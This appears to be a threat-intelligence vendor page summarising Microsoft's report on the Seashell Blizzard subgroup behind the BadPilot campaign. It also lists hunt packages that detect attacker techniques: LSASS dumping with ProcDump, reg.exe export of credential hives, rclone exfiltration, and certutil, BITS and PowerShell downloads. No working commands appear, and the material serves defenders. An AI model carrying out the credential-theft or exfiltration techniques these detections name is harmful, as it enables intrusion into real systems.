Researchers at Microsoft published an analysis of a subgroup within infamous Russian state-sponsored actor Seashell Blizzard conducting a campaign code named BadPilot since 2021. During this campaign, the subgroup compromised internet-facing infrastructure in order to gain and establish persistence to globally diverse high-value targets, including energy, telecommunications, shipping, arms manufacturing and international government entities. The threat actor initially concentrated their efforts on Ukraine and eventually expanded globally, targeting entities in the United States, United Kingdom, Canada and Australia. Seashell Blizzard expanding beyond their usual Eastern European activity is important that the community takes note of, as the threat group is considered highly sophisticated with a diverse spectrum of capabilities that consist of cyber espionage to the destruction of targeted systems. The subgroup conducting BadPilot has been observed to be exploiting known vulnerabilities, such as CVE-2024-1709 (ConnectWise ScreenConnect) and CVE-2023-48788 (Fortinet FortiClient EMS), as well as abusing remote access tools such as Atera Agent and Splashtop Remote Services to maintain access. Due to the observed reach of the BadPilot campaign reaching a global scale, it is important that organizations prepare themselves and stay on top of the activity related to this subgroup going forward.
TITAN References: TITAN Profile Report: Seashell Blizzard
Related Hunt Package Collection: Seashell Blizzard Threat Group
Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!
This package identifies activity in Powershell Logging associated with BITS either with bitsadmin.exe or the BITS cmdlets and module in PowerShell.
ACCESS HUNT PACKAGE
This package identifies activity associated with BITS either with bitsadmin.exe or the BITS cmdlets and module in powershell.
ACCESS HUNT PACKAGE
The provided logic looks for single character batch script (.bat) file names found in the command line arguments of a process execution. This is often malicious activity as single character script files are uncommon in an environment when executed for legitimate purposes.
ACCESS HUNT PACKAGE
This will identify processes executed with common arguments associated with rclone activity used to exfiltrate.
ACCESS HUNT PACKAGE
Identify suspicious downloads with the built-in windows tool CertUtil. CertUtil is typically not utilized to download executables or files in general from the web, as such its usage to download files from the Internet should be considered suspicious.
ACCESS HUNT PACKAGE
This Threat Hunt package identifies the use of 'takeown.exe' to modify files ownership enabling further interaction with those files. This technique can be utilized by malware and ransomware in order to access sensitive files to steal or to unlock so they can be encrypted.
ACCESS HUNT PACKAGE
This threat hunt package identifies instances where PowerShell is being used to download files from external sources, a common technique used in malware delivery and lateral movement. The hunt examines various methods by which PowerShell can be leveraged for file downloads, including the use of cmdlets such as Invoke-WebRequest (iwr), Invoke-RestMethod (irm), and Start-BitsTransfer (sbt), as well as direct utilization of .NET classes like System.Net.WebClient and HttpClient. The package also checks for potentially suspicious use of aliases (curl, wget) and other common executables that invoke PowerShell scripts to download malicious payloads.
ACCESS HUNT PACKAGE
This Threat Hunt package identifies when a tool like a lolbin is used to fetch the Atera's Remote Montoring and Management (RMM) agent directly from Atera's distribution domain.
ACCESS HUNT PACKAGE
This Threat Hunt package identifies when the Atera's Remote Montoring and Management (RMM) agent is downloaded directly from Atera's distribution domain.
ACCESS HUNT PACKAGE
This use case attempts to find execution of reg.exe with parameters specifying an export of keys that contain hashed credentials that attackers may try to crack offline.
ACCESS HUNT PACKAGE
Identify ProcDump usage as a means to dump LSASS data. ProcDump is a SysInternals tool that can be used to dump process memory, dumping the process memory of lsass.exe which can be used to obtain credentials.
ACCESS HUNT PACKAGE
mommy Access Broker is enabling access-as-a-service operations through detailed intrusion guides and compromised credentials, and Intel 471 has released reporting and Hunt Packages to support threat hunting and detection.
NATO's annual summit comes as member countries face a rapidly changing global security dynamic, with cyber playing a significant role.
DragonForce is a Ransomware-as-a-Service group targeting global industries with customizable payloads, enabling widespread attacks and persistent extortion through an affiliate-driven model.
Stay informed with our weekly executive update, sending you the latest news and timely data on the threats, risks, and regulations affecting your organization.